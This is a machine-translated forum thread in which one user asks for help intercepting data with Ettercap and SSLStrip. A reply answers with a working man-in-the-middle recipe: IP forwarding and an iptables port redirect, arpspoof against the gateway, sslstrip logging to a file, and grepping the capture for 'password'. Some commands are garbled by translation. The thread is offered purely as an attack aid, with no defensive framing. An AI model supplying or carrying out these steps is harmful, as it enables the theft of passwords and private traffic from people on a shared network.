我正在为此使用Backtrack5 ..但被卡住了...我无法获得我想要的数据,我为此使用Ettercap和SSL Strip ...
这里有人知道怎么做吗?
我正在为此使用Backtrack5 ..但被卡住了...我无法获得我想要的数据,我为此使用Ettercap和SSL Strip ...
这里有人知道怎么做吗?
不知道你是怎么做的,但对我来说,ettercap-gtk(gui)一直是垃圾。我建议跳过 ettercap,除非你想要简单的 DNS 欺骗,然后走另一条路。
让我给你一些步骤,首先为这次攻击设置你的 iptables(中间人,amirite)并启用 ip_forward(ing)
回声“1”> /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (可以选择你想发送到的任何端口)
现在成为中间人:这里我们使用 arpspoof: arpspoof -i wlan0(或任何接口)192.168.1.X(X 是网关,通常为 .1 或 .255)
然后使用 SSLStrip,您可以继续使用 ./sslstrip.py -1 1337 -w 文件名(1337 是之前的端口,文件名是您要将数据转储到的任何文件名)
cat 文件名(来自较早)甚至管道 | grep "password" 或任何你正在嗅探的东西,或者你可以转储所有东西。该文件将充满捕获/剥离的 https 数据。